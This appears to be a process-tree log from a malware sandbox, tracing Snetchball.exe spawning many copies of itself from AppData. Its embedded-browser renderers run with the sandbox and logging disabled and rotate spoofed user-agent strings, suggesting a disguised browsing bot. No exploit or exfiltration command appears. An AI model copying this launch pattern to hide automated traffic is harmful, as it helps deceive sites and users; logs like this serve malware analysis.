C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3104 --field-trial-handle=2768,i,268561796635738986,15933459970118420474,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:148⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4148 --field-trial-handle=2768,i,268561796635738986,15933459970118420474,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:148⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"47⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"47⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"47⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"47⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"47⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=2776,i,14363554365350237927,4687397199639950954,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:145⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4264 --field-trial-handle=2776,i,14363554365350237927,4687397199639950954,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:145⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"43⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"43⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"43⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"43⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"43⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3864 --field-trial-handle=2808,i,15454742709647543125,13101203703203642475,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:842⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4188 --field-trial-handle=2788,i,210827359154614944,17208522435841593598,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:139⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"37⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"37⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"37⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"37⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"37⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3104 --field-trial-handle=2756,i,17540745359484800698,1189745792686981842,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:133⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4324 --field-trial-handle=2756,i,17540745359484800698,1189745792686981842,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:133⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=2788,i,18077429005461592365,1572461295042386729,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:130⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3796 --field-trial-handle=2788,i,18077429005461592365,1572461295042386729,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:130⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2880,i,18042505807727853842,17488105781846164465,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:127⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4172 --field-trial-handle=2880,i,18042505807727853842,17488105781846164465,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:127⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=2788,i,17552115894590141996,15666216598231460867,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:124⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4284 --field-trial-handle=2788,i,17552115894590141996,15666216598231460867,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:124⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6286.224 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3076 --field-trial-handle=2848,i,689444666570067090,17619956266482891672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:122⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6286.224 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4156 --field-trial-handle=2848,i,689444666570067090,17619956266482891672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:122⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=2880,i,14336546605711011291,5422109165545970683,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4124 --field-trial-handle=2880,i,14336546605711011291,5422109165545970683,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
-
-
